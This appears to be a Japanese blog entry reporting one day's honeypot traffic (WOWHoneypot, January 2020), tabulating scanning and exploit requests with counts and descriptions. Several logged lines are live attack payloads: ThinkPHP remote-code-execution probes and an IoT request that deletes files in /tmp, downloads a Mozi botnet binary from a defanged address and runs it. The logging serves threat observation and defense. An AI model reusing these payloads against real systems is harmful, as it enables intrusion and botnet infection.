WOWHoneypot観察(297日目)
2020/01/07(火)
トータルは73件でした。
ハンティングログはありませんでした。
| 件数 | 概要 | リクエスト |
|---|---|---|
| 34 | アクセス | GET / |
| 5 | 調査 | GET /script |
| 4 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
| 4 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
| 4 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
| 4 | WordPressのPingbackを狙った通信 | GET /xmlrpc.php |
| 2 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
| 2 | リモートデバッグの調査 | GET /?XDEBUG_SESSION_START=phpstorm |
| 1 | Linksys ルータの E シリーズの脆弱性を狙った通信 | POST /tmUnblock.cgi |
| 1 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
| 1 | WordPressの調査 | GET /wp-admin/admin-ajax.php |
| 1 | 調査 | GET /version |
| 1 | Solrの調査 | GET /solr/admin/info/system?wt=json |
| 1 | IoT機器の脆弱性を狙った通信? | GET /shell?cd+/tmp;rm+-rf+*;wget+hxxp[:]//60.184.95.4:42182/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws |
| 1 | Jenkinsの脆弱性を狙った通信 | GET /securityRealm/user/admin/search/index?q=a |
| 1 | Tomcat管理ページの調査 | GET /manager/html |
| 1 | ファイル調査 | GET /main.dotm |
| 1 | ThinkPHPの脆弱性を狙った通信 | GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP |
| 1 | 調査 | GET /index.php |
| 1 | API調査 | GET /api |
| 1 | ThinkCMFの脆弱性を狙った通信 | GET /?a=fetch&content= |
| 1 | 不正中継の試み | CONNECT ip.ws.126.net:443 |
にほんブログ村